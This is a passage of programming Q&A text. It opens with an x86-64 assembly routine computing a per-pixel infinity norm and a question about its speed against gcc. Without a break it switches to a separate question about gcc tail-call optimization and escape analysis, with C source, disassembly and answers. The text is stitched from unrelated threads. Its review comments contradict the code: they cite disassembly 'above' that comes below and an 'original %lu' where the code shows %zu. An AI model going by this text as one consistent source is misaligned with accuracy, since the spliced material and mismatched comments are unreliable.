movzx rbp, r15b
shr r15, 8
movzx r8, r15b
shr r15, 8
movzx r9, r15b
shr r15, 8
call inf_norm                      ; second 4 bytes rotated into rax
mov [rdx + rcx*4 - 8], rax         ; store both output pixels at once
sub rcx, 2                         ; consumed two pixels this iteration
jmp .cicle
.tend:
add rsp, 8
pop rbx
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
; Per-pixel infinity norm: computes max(|x1-x2|, |y1-y2|, |z1-z2|) and
; rotates the result byte into rax three times plus an opaque alpha byte.
; Across the two calls per loop iteration, the four `ror rax, 8` per call
; (8 bytes total) leave both packed output pixels in rax.
; Absolute value uses the branch-free sign-mask trick:
;   s = v >> 31 (arithmetic shift);  |v| = (v XOR s) - s
; Clobbers: rax, rbp, r8, r9, r12, r13, r14.
; r12w = x_1
; r13w = y_1
; r14w = z_1
; rbp = x_2
; r8 = y_2
; r9 = z_3
inf_norm:
sub r12d, ebp                      ; x1 - x2
mov ebp, r12d
sar ebp, 0x1f                      ; ebp = sign mask of the difference
xor r12d, ebp
sub r12d, ebp                      ; r12d = |x1 - x2|
sub r13d, r8d                      ; y1 - y2
mov r8d, r13d
sar r8d, 0x1f
xor r13d, r8d
sub r13d, r8d                      ; r13d = |y1 - y2|
sub r14d, r9d                      ; z1 - z2
mov r9d, r14d
sar r9d, 0x1f
xor r14d, r9d
sub r14d, r9d                      ; r14d = |z1 - z2|
cmp r12w, r13w
jg .z_y                            ; x > y: pick max(x, z)
cmp r13w, r14w
cmovl r13d, r14d                   ; x <= y: r13 = max(y, z)
jmp .insert
.z_y:
cmp r12w, r14w
mov r13d, r14d
cmovge r13d, r12d                  ; r13 = max(x, z)
.insert:
mov al, r13b                       ; insert result byte, rotate it up
ror rax, 8
mov al, r13b
ror rax, 8
mov al, r13b
ror rax, 8
mov al, 255                        ; alpha byte
ror rax, 8
ret
So now I find that my hand-made assembly routine is in some cases almost two times slower than gcc -O3/-O2, but for the life of me I don't get why. Are the calls affecting the performance? Or the rotations? I wrote an implementation using shifts instead of rotates, but it was a bit slower than this one. Any help would be appreciated.
I have tried the following code on gcc 4.4.5 on Linux and gcc-llvm on Mac OSX(Xcode 4.2.1) and this. The below are the source and the generated disassembly of the relevant functions. (Added: compiled with gcc -O2 main.c)
#include <stdio.h>
/* Recursion experiment: prints the address of a local plus an
 * uninitialized value, then tail-calls itself forever (no base case —
 * deliberate for this TCO demo). Taking &m forces m onto the stack,
 * which is what blocks tail-call optimization here.
 * NOTE(review): reading uninitialized `n` is undefined behavior;
 * presumably intentional as part of the experiment. */
__attribute__((noinline))
static void g(long num)
{
long m, n;
printf("%p %ld\n", &m, n);   /* &m escapes to printf; n is uninitialized */
return g(num-1);             /* unbounded recursion: num is never checked */
}
/* Control case for g(): identical shape, but no address-of on the
 * locals — so nothing escapes, and (per the disassembly above) gcc
 * turns the tail call into a loop.
 * NOTE(review): reading uninitialized `m` and `n` is undefined
 * behavior; presumably intentional as part of the experiment. */
__attribute__((noinline))
static void h(long num)
{
long m, n;
printf("%ld %ld\n", m, n);   /* both values uninitialized; no & taken */
return h(num-1);             /* tail call — optimized into a jmp */
}
/* Driver loop: reads a number, runs both recursion experiments, then
 * tail-calls itself forever (the disassembly shows this compiled to a
 * jmp). NOTE(review): the scanf return value is unchecked — on EOF or
 * bad input *num is left stale and the loop continues regardless. */
__attribute__((noinline))
static void f(long * num)
{
scanf("%ld", num);
g(*num);
h(*num);
return f(num);   /* infinite tail recursion, TCO'd into a loop */
}
/* Entry point: report basic type sizes, then hand control to the
 * never-returning driver f(). sizeof yields size_t, so the correct
 * conversion specifier is %zu — the original %lu is a format/argument
 * mismatch (UB) on targets where size_t is not unsigned long, e.g. the
 * 32-bit build shown in the disassembly above. */
int main(void)
{
printf("int:%zu long:%zu unsigned:%zu\n", sizeof(int), sizeof(long), sizeof(unsigned));
long num;
f(&num);   /* never returns */
return 0;
}
08048430 <g>:
8048430: 55 push %ebp
8048431: 89 e5 mov %esp,%ebp
8048433: 53 push %ebx
8048434: 89 c3 mov %eax,%ebx
8048436: 83 ec 24 sub $0x24,%esp
8048439: 8d 45 f4 lea -0xc(%ebp),%eax
804843c: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8048443: 00
8048444: 89 44 24 04 mov %eax,0x4(%esp)
8048448: c7 04 24 d0 85 04 08 movl $0x80485d0,(%esp)
804844f: e8 f0 fe ff ff call 8048344 <printf#plt>
8048454: 8d 43 ff lea -0x1(%ebx),%eax
8048457: e8 d4 ff ff ff call 8048430 <g>
804845c: 83 c4 24 add $0x24,%esp
804845f: 5b pop %ebx
8048460: 5d pop %ebp
8048461: c3 ret
8048462: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
8048469: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
08048470 <h>:
8048470: 55 push %ebp
8048471: 89 e5 mov %esp,%ebp
8048473: 83 ec 18 sub $0x18,%esp
8048476: 66 90 xchg %ax,%ax
8048478: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
804847f: 00
8048480: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048487: 00
8048488: c7 04 24 d8 85 04 08 movl $0x80485d8,(%esp)
804848f: e8 b0 fe ff ff call 8048344 <printf#plt>
8048494: eb e2 jmp 8048478 <h+0x8>
8048496: 8d 76 00 lea 0x0(%esi),%esi
8048499: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
080484a0 <f>:
80484a0: 55 push %ebp
80484a1: 89 e5 mov %esp,%ebp
80484a3: 53 push %ebx
80484a4: 89 c3 mov %eax,%ebx
80484a6: 83 ec 14 sub $0x14,%esp
80484a9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
80484b0: 89 5c 24 04 mov %ebx,0x4(%esp)
80484b4: c7 04 24 e1 85 04 08 movl $0x80485e1,(%esp)
80484bb: e8 94 fe ff ff call 8048354 <__isoc99_scanf#plt>
80484c0: 8b 03 mov (%ebx),%eax
80484c2: e8 69 ff ff ff call 8048430 <g>
80484c7: 8b 03 mov (%ebx),%eax
80484c9: e8 a2 ff ff ff call 8048470 <h>
80484ce: eb e0 jmp 80484b0 <f+0x10>
We can see that g() and h() are mostly identical except the & (address of) operator beside the argument m of printf()(and the irrelevant %ld and %p).
However, h() is tail-call optimized and g() is not. Why?
In g(), you're taking the address of a local variable and passing it to a function. A "sufficiently smart compiler" should realize that printf does not store that pointer. Instead, gcc and llvm assume that printf might store the pointer somewhere, so the call frame containing m might need to be "live" further down in the recursion. Therefore, no TCO.
It's the & that does it. It tells the compiler that m should be stored on the stack. Even though it is passed to printf, the compiler has to assume that it might be accessed by somebody else and thus must the cleaned from the stack after the call to g.
In this particular case, as printf is known by the compiler (and it knows that it does not save pointers), it could probably be taught to perform this optimization.
For more info on this, look up 'escape analysis'.